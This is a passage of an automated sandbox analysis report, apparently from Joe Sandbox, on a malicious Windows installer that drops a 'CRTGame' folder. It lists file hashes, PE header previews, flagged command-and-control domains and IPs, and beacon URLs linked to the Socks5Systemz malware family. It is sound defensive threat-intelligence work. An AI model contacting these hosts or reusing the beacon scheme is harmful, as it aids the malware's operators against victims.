C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp	3%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmp	0%	ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svn/trunk	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svnrepository	0%	Avira URL Cloud	safe
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2	0%	Avira URL Cloud	safe
http://bodotpd.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svn/trunkrepository	0%	Avira URL Cloud	safe
http://185.237.206.129/en-US	0%	Avira URL Cloud	safe
http://www.mp3dev.org/ID3Error	0%	Avira URL Cloud	safe
gdpkvkr.com	0%	Avira URL Cloud	safe
http://www.mpg123.de	0%	Avira URL Cloud	safe
http://mingw-w64.sourceforge.net/X	0%	Avira URL Cloud	safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde	0%	Avira URL Cloud	safe
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde	0%	Avira URL Cloud	safe
http://lame.sf.net	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0Q	0%	Avira URL Cloud	safe
http://lame.sf.net32bits	0%	Avira URL Cloud	safe
http://LosslessAudio.org/0	0%	Avira URL Cloud	safe
http://www.mp3dev.org/	0%	Avira URL Cloud	safe
https://mp4v2.googlecode.com/svn	0%	Avira URL Cloud	safe
http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bodotpd.com	94.232.249.187	true	true		unknown
gdpkvkr.com	185.237.206.129	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb	true	Avira URL Cloud: safe	unknown
gdpkvkr.com	true	Avira URL Cloud: safe	unknown
http://bodotpd.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb	true	Avira URL Cloud: safe	unknown
http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	false		high
https://gcc.gnu.org/bugs/):	is-04UN3.tmp.1.dr	false		high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false		high
https://mp4v2.googlecode.com/svn/trunk	is-OGODD.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	false		high
http://185.237.206.129/en-US	crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	false		high
http://www.mp3dev.org/ID3Error	is-1CHIA.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://mp4v2.googlecode.com/svnrepository	is-OGODD.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	is-GSP1P.tmp.1.dr, is-83310.tmp.1.dr	false		high
http://www.mpg123.de	is-DFCBR.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://mp4v2.googlecode.com/svn/trunkrepository	is-OGODD.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false		high
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2	crtgame.exe, 00000006.00000002.2945587982.00000000036F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.remobjects.com/psU	Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	false		high
http://lame.sf.net	is-1CHIA.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://streams.videolan.org/upload/	is-EQ4MD.tmp.1.dr	false		high
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde	crtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mingw-w64.sourceforge.net/X	is-GRQ3N.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde	crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ssl.com/repository0	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false		high
http://LosslessAudio.org/0	is-OMKRE.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://lame.sf.net32bits	is-1CHIA.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://www.mp3dev.org/	is-1CHIA.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://code.google.com/p/mp4v2D	is-OGODD.tmp.1.dr	false		high
http://www.remobjects.com/ps	Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.dr	false		high
https://mp4v2.googlecode.com/svn	is-OGODD.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false		high
http://ocsps.ssl.com0Q	is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	is-PBK8V.tmp.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.105.201.183	unknown	Netherlands	24875	NOVOSERVE-ASNL	false
94.232.249.187	bodotpd.com	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	true
185.237.206.129	gdpkvkr.com	Ukraine	21100	ITLDC-NLUA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575254
Start date and time:	2024-12-15 00:51:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Mg5bMQ2lWi.exe renamed because original name is a hash value
Original Sample Name:	7700eba1ceaa134b1da16d1ede0e7894.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/128@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 179 Number of non-executed functions: 242
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Mg5bMQ2lWi.exe

Simulations

Behavior and APIs

Time	Type	Description
18:52:39	API Interceptor	434302x Sleep call for process: crtgame.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.105.201.183	OFjT8HmzFJ.exe	Get hash	malicious	Socks5Systemz	Browse	404
	N6jsQ3XNNX.exe	Get hash	malicious	Socks5Systemz	Browse	200
	cv viewer plugin 8.31.40.exe	Get hash	malicious	Socks5Systemz	Browse	200
94.232.249.187	cNF6fXdjPw.dll	Get hash	malicious	Socks5Systemz	Browse
	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
185.237.206.129	Invoice.xlsx	Get hash	malicious	FormBook	Browse	185.237.206.129/jinn.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITLDC-NLUA	cNF6fXdjPw.dll	Get hash	malicious	Socks5Systemz	Browse	185.237.206.129
	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	185.237.206.129
	file.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	secure.htm	Get hash	malicious	HTMLPhisher	Browse	217.12.218.219
	EIqeWlQMGR.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	9WqvcxYptm.exe	Get hash	malicious	AgentTesla	Browse	185.174.173.22
	sd2.ps1	Get hash	malicious	Unknown	Browse	195.123.217.43
	Pago_7839389309_8w20w808_723869189.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
NOVOSERVE-ASNL	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	89.105.201.183
	getlab.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Nymaim, Socks5Systemz	Browse	89.105.201.183
	i7j22nof2Q.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	file.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	gxjIKuKnu7.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
	OFjT8HmzFJ.exe	Get hash	malicious	Socks5Systemz	Browse	89.105.201.183
INT-PDN-STE-ASSTEPDNInternalASSY	cNF6fXdjPw.dll	Get hash	malicious	Socks5Systemz	Browse	94.232.249.187
	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	94.232.249.187
	jade.arm.elf	Get hash	malicious	Mirai	Browse	31.9.99.97
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	95.212.143.36
	jade.x86.elf	Get hash	malicious	Mirai	Browse	31.14.164.17
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	95.212.143.56

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	wG1fFAzGfH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	AGcC2uK0El.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	6hvZpn91O8.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	j9htknb7BQ.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Win32.Agent.2721.19195.exe	Get hash	malicious	Petite Virus	Browse
	SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exe	Get hash	malicious	Petite Virus	Browse
	F9DB076BD8F99C606CDAE2D6EB5F4EC112A705CF28513.exe	Get hash	malicious	Petite Virus, PureLog Stealer, Raccoon Stealer v2	Browse
	ZC8t06QEi5.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	sOGrMGU09M.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse

Created / dropped Files

C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: KRdh0OaXqH.exe, Detection: malicious, Browse Filename: wG1fFAzGfH.exe, Detection: malicious, Browse Filename: AGcC2uK0El.exe, Detection: malicious, Browse Filename: 6hvZpn91O8.exe, Detection: malicious, Browse Filename: j9htknb7BQ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\COPYING.LGPLv2.1 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: KRdh0OaXqH.exe, Detection: malicious, Browse Filename: wG1fFAzGfH.exe, Detection: malicious, Browse Filename: AGcC2uK0El.exe, Detection: malicious, Browse Filename: 6hvZpn91O8.exe, Detection: malicious, Browse Filename: j9htknb7BQ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Agent.2721.19195.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exe, Detection: malicious, Browse Filename: F9DB076BD8F99C606CDAE2D6EB5F4EC112A705CF28513.exe, Detection: malicious, Browse Filename: ZC8t06QEi5.exe, Detection: malicious, Browse Filename: sOGrMGU09M.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	266254
Entropy (8bit):	6.343813822604148
Encrypted:	false
SSDEEP:	3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
MD5:	8B099FA7B51A8462683BD6FF5224A2DC
SHA1:	C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
SHA-256:	438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
SHA-512:	9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	906766
Entropy (8bit):	6.450201653594769
Encrypted:	false
